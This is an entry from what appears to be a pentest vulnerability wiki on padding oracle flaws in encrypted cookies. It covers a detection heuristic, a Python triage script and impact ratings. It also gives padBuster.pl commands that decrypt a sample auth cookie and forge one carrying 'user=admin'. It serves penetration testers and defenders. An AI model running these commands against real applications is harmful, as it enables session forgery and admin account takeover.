Cobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V6 - Cryptography

Weak TLS configuration - Padding Oracle

POC

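Detection: If you create an account, log in twice with it, and the cookie sent by the application does not change between the two logins, there is probably a padding oracle vulnerability. The static cookie only shows that the value is produced deterministically; the oracle itself is confirmed when the application responds differently to a cookie with invalid padding than to one with valid padding.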
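The detection heuristic above as a triage script, added here as an example and not part of the original wiki entry: it decodes the cookies issued by two logins of one account and reports whether the value is static and which block sizes its length fits. The function names and report fields are assumptions of this example; PAGE_COOKIE is the sample from this page and CONSTRUCTED_COOKIE is made up for the comparison.

```python
import base64
import binascii
from urllib.parse import unquote

PAGE_COOKIE = "u7bvLewln6NMqlB%2BCRVlL%2FFMi3ZPEyUV"            # sample from this page
CONSTRUCTED_COOKIE = "AAECAwQFBgcICQoLDA0ODxAREhMUFRYX"        # constructed: bytes 0..23

def decode_cookie(value):
    """URL-decode, then try hex and base64 (standard or URL-safe); None if neither fits."""
    raw = unquote(value)
    try:
        return bytes.fromhex(raw)
    except ValueError:
        pass
    padded = raw + "=" * (-len(raw) % 4)          # tolerate stripped '=' padding
    try:
        return base64.b64decode(padded.replace("-", "+").replace("_", "/"), validate=True)
    except (binascii.Error, ValueError):
        return None

def triage(cookie_login1, cookie_login2, block_sizes=(8, 16)):
    """Apply the heuristic to the cookies issued by two logins of the same account."""
    a, b = decode_cookie(cookie_login1), decode_cookie(cookie_login2)
    if a is None or b is None:
        return {"decodable": False, "static": cookie_login1 == cookie_login2,
                "block_sizes": [], "shared_leading_blocks": 0, "review": False}
    # Block sizes that both decoded values are aligned to (8 = DES/3DES, 16 = AES).
    sizes = [n for n in block_sizes if a and b and len(a) % n == 0 and len(b) % n == 0]
    shared = 0
    if sizes:
        n = sizes[0]
        # Count identical leading blocks; a fresh random IV per login would give 0.
        for i in range(0, min(len(a), len(b)), n):
            if a[i:i + n] != b[i:i + n]:
                break
            shared += 1
    static = a == b
    return {"decodable": True, "static": static, "block_sizes": sizes,
            "shared_leading_blocks": shared,
            # Static and block-aligned: queue the cookie for a padding-oracle check.
            "review": static and bool(sizes)}

if __name__ == "__main__":
    print(triage(PAGE_COOKIE, PAGE_COOKIE))
    print(triage(PAGE_COOKIE, CONSTRUCTED_COOKIE))
```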

Exploitation: Use: padBuster.pl URL EncryptedSample BlockSize [options]

/usr/bin/perl padBuster.pl URL u7bvLewln6NMqlB%2BCRVlL%2FFMi3ZPEyUV 8 -cookies auth=u7bvLewln6NMqlB%2BCRVlL%2FFMi3ZPEyUV

/usr/bin/perl padBuster.pl URL u7bvLewln6NMqlB%2BCRVlL%2FFMi3ZPEyUV 8 -cookies auth=u7bvLewln6NMqlB%2BCRVlL%2FFMi3ZPEyUV -plaintext user=admin

Impact

Low-Medium (depends on the information disclosure)

Likelihood

Low-Medium